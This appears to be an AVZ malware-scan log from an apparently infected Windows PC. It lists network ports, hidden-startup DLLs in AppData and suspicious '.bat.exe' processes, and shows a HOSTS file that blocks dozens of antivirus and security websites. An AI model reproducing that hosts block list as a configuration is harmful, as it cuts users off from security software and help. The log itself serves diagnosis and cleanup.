49460	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
49666	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
50042	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
50189	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
50264	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
50452	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
50725	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
50843	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
51180	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
51431	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
51699	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
51820	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
52167	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
52321	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
52715	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
52953	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
52956	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53522	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53613	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53775	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53832	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
54010	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
54027	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
54128	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
54177	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
54335	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
54482	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
54652	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
55117	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
55193	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
55497	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
55656	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
55790	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
55884	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
55924	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
55998	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
56036	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
56195	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
57065	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
57740	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
58952	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
59048	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
59071	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
59323	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
59402	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
59803	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
61313	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
61417	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
61446	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
61641	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
61652	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
61972	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
62370	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
62406	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
62558	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
62868	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
62909	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
62988	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
63034	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
63445	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
63568	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
64150	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
64212	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
64424	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
64567	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
64669	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
64783	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
64801	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
64861	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
49301	LISTENING	--	--	c:\program files\common files\apple\mobile device support\applemobiledeviceservice.exe [6140] 100.84 kb, rsAh, created: 08.10.2022 03:00:46, modified: 08.10.2022 03:00:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64	OnLine keyLogger	MobileDeviceService	© 2022 Apple Inc. All rights reserved.
49302	LISTENING	--	--	c:\program files\common files\apple\mobile device support\applemobiledeviceservice.exe [6140] 100.84 kb, rsAh, created: 08.10.2022 03:00:46, modified: 08.10.2022 03:00:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		MobileDeviceService	© 2022 Apple Inc. All rights reserved.
137	LISTENING	--	--	System [4] error getting file info Script: Quarantine, Delete, Delete via BC, Terminate	x64	Microsoft NET
138	LISTENING	--	--	System [4] error getting file info Script: Quarantine, Delete, Delete via BC, Terminate	x64	Microsoft NET
27036	LISTENING	--	--	c:\program files (x86)\steam\steam.exe [13792] 4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Steam	Copyright (C) 2021 Valve Corporation
Items found - 862, recognized as trusted - 50

Downloaded Program Files (DPF)

File name	Redirector	Description	Manufacturer	CLSID	Source URL
Items found - 0, recognized as trusted - 0

Control Panel Applets (CPL)

File name	Redirector	Description	Manufacturer
Items found - 34, recognized as trusted - 34

Active Setup

File name	Redirector	Description	Manufacturer	CLSID
C:\Program Files (x86)\Google\Chrome\Application\114.0.5735.248\Installer\chrmstp.exe 5066.77 kb, rsAh, created: 20.07.2023 20:42:27, modified: 20.07.2023 20:42:20 Script: Quarantine, Delete, Delete via BC	x64	Google Chrome Installer	Copyright 2023 Google LLC. All rights reserved.	{8A69D345-D564-463c-AFF1-A69D9E530F96} Delete
C:\Program Files (x86)\Microsoft\Edge\Application\115.0.1901.183\Installer\setup.exe 3577.91 kb, rsAh, created: 23.07.2023 03:50:06, modified: 23.07.2023 03:49:58 Script: Quarantine, Delete, Delete via BC	x64	Microsoft Edge Installer	Copyright Microsoft Corporation. All rights reserved.	{9459C573-B17A-45AE-9F64-1857B5D58CEE} Delete
C:\Program Files (x86)\Google\Chrome\Application\114.0.5735.248\Installer\chrmstp.exe 5066.77 kb, rsAh, created: 20.07.2023 20:42:27, modified: 20.07.2023 20:42:20 Script: Quarantine, Delete, Delete via BC	x64	Google Chrome Installer	Copyright 2023 Google LLC. All rights reserved.	{8A69D345-D564-463c-AFF1-A69D9E530F96} Delete
C:\Program Files (x86)\Microsoft\Edge\Application\115.0.1901.183\Installer\setup.exe 3577.91 kb, rsAh, created: 23.07.2023 03:50:06, modified: 23.07.2023 03:49:58 Script: Quarantine, Delete, Delete via BC	x64	Microsoft Edge Installer	Copyright Microsoft Corporation. All rights reserved.	{9459C573-B17A-45AE-9F64-1857B5D58CEE} Delete
Items found - 22, recognized as trusted - 18

HOSTS file

Hosts file record

0.0.0.0       avast.com

0.0.0.0       www.avast.com

0.0.0.0       totalav.com

0.0.0.0       www.totalav.com

0.0.0.0       scanguard.com

0.0.0.0       www.scanguard.com

0.0.0.0       totaladblock.com

0.0.0.0       www.totaladblock.com

0.0.0.0       pcprotect.com

0.0.0.0       www.pcprotect.com

0.0.0.0       mcafee.com

0.0.0.0       www.mcafee.com

0.0.0.0       bitdefender.com

0.0.0.0       www.bitdefender.com

0.0.0.0       us.norton.com

0.0.0.0       www.us.norton.com

0.0.0.0       avg.com

0.0.0.0       www.avg.com

0.0.0.0       malwarebytes.com

0.0.0.0       www.malwarebytes.com

0.0.0.0       pandasecurity.com

0.0.0.0       www.pandasecurity.com

0.0.0.0       surfshark.com

0.0.0.0       www.surfshark.com

0.0.0.0       avira.com

0.0.0.0       www.avira.com

0.0.0.0       norton.com

0.0.0.0       www.norton.com

0.0.0.0       eset.com

0.0.0.0       www.eset.com

0.0.0.0       zillya.com

0.0.0.0       www.zillya.com

0.0.0.0       kaspersky.com

0.0.0.0       www.kaspersky.com

0.0.0.0       usa.kaspersky.com

0.0.0.0       www.usa.kaspersky.com

0.0.0.0       dpbolvw.net

0.0.0.0       www.dpbolvw.net

0.0.0.0       sophos.com

0.0.0.0       www.sophos.com

0.0.0.0       home.sophos.com

0.0.0.0       www.home.sophos.com

0.0.0.0       www.adaware.com

0.0.0.0       adaware.com

0.0.0.0       www.ahnlab.com

0.0.0.0       ahnlab.com

0.0.0.0       www.bullguard.com

0.0.0.0       bullguard.com

0.0.0.0       clamav.net

0.0.0.0       www.clamav.net

0.0.0.0       www.drweb.com

0.0.0.0       drweb.com

0.0.0.0       emsisoft.com

0.0.0.0       www.emsisoft.com

0.0.0.0       www.f-secure.com

0.0.0.0       f-secure.com

0.0.0.0       www.zonealarm.com

0.0.0.0       zonealarm.com

0.0.0.0       www.trendmicro.com

0.0.0.0       trendmicro.com

0.0.0.0       www.ccleaner.com

0.0.0.0       ccleaner.com

0.0.0.0       www.virustotal.com

0.0.0.0       virustotal.com

Clear Hosts file

Protocols and handlers

File name	Redirector	Type	Description	Manufacturer	CLSID
Items found - 44, recognized as trusted - 44

Shared resources

Network name	Path	Notes
C$	C:\	Default share
D$	D:\	Default share
ADMIN$	C:\WINDOWS	Remote Admin
IPC$		Remote IPC

Background Intelligent Transfer Service (BITS) Jobs

BITS Job ID	Job name	Status	Source URL or file name	Destination file name	Notification program
{890FA351-9F8E-4556-A468-AC6340F97EC9}	Edge Component Updater	TRANSFERRED	http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/ec243c2e-e29f-46d6-92ef-c60f8cfa76e0?P1=1690605975&P2=404&P3=2&P4=QZbQ8%2ffl7n7jU6O0Ny0oQUazYtvtJjyw9ch5ZKSqDw4Z9mZUZhlemBPBsqRU1q6KDUXTB%2bvPPnvZ6Fp%2f%2bNbf%2fw%3d%3d	C:\Users\Isaac\AppData\Local\Temp\edge_BITS_19964_1722601826\ec243c2e-e29f-46d6-92ef-c60f8cfa76e0

Suspicious objects

File	Redirector	Description	Type
c:\users\isaac\appdata\roaming\1000071060\rwfacade.dll 1302.60 kb, rsAh, created: 05.03.2023 23:25:56, modified: 05.03.2023 23:25:57 Script: Quarantine, Delete, Delete via BC	x32	Suspicion by Heuristic analysis	HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rwfacade.dll
c:\users\isaac\appdata\roaming\1000072060\rlmp32wlve.dll 1190.61 kb, rsAh, created: 05.03.2023 23:25:57, modified: 05.03.2023 23:25:58 Script: Quarantine, Delete, Delete via BC	x32	Suspicion by Heuristic analysis	HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rlmp32wlve.dll
c:\users\isaac\appdata\roaming\1000079060\rlmp32wce.dll 14310.47 kb, rsAh, created: 19.03.2023 20:54:11, modified: 19.03.2023 20:57:05 Script: Quarantine, Delete, Delete via BC	x32	Suspicion by Heuristic analysis	HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rlmp32wce.dll
c:\users\isaac\appdata\roaming\1000107060\ntredirect.dll 19455.50 kb, rsAh, created: 02.04.2023 17:53:25, modified: 02.04.2023 17:58:52 Script: Quarantine, Delete, Delete via BC	x32	Suspicion by Heuristic analysis	HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntredirect.dll

Attention !!! Database was last updated 3/14/2023 it is necessary to update the database (via File - Database update)
AVZ Toolkit log; AVZ version is 5.67 private build [14.03.2023  5:00:04]
Scanning started at 23.07.2023 13:29:18
Database loaded: signatures - 9995, NN profile(s) - 2, malware removal microprograms - 23, signature database released 14.03.2023 04:00
Heuristic microprograms loaded: 417
PVS microprograms loaded: 10
Digital signatures of system files loaded: 654627
Heuristic analyzer mode: Maximum heuristics mode
Malware removal mode: disabled
Windows version is: 10.0.22621,  "Windows 10 Home" (Windows 10 Home) x64, install date 23.07.2023 02:52:51 ; AVZ is run with administrator rights (+)
System Restore: enabled
1. Searching for Rootkits and other software intercepting API functions
1.1 Searching for user-mode API hooks
 Analysis: kernel32.dll, export table found in section .rdata
 Analysis: ntdll.dll, export table found in section .text
 Analysis: user32.dll, export table found in section .text
 Analysis: advapi32.dll, export table found in section .text
 Analysis: ws2_32.dll, export table found in section .text
 Analysis: wininet.dll, export table found in section .text
 Analysis: rasapi32.dll, export table found in section .text
 Analysis: urlmon.dll, export table found in section .text
 Analysis: netapi32.dll, export table found in section .text
1.4 Searching for masking processes and drivers
 Checking not performed: extended monitoring driver (AVZPM) is not installed
2. Scanning RAM
 Number of processes found: 256
Extended process analysis: 4412 C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
Extended process analysis: 15860 C:\Users\Isaac\AppData\Roaming\tDSul.bat.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Loads RASAPI DLL - may use dialing ?
Extended process analysis: 16056 C:\Users\Isaac\AppData\Roaming\kKGAC.bat.exe
[ES]:Program code includes networking-related functionality
[ES]:Listens on HTTP ports !
[ES]:Application has no visible windows
Extended process analysis: 16716 C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\EasyTuneEngineService.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
Extended process analysis: 13932 C:\Users\Isaac\AppData\Roaming\tMaIE.bat.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Loads RASAPI DLL - may use dialing ?
Extended process analysis: 20272 C:\Program Files (x86)\GIGABYTE\SmartSurvey\GbtCareBotService.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Loads RASAPI DLL - may use dialing ?
Extended process analysis: 23568 C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe
[ES]:Program code includes networking-related functionality
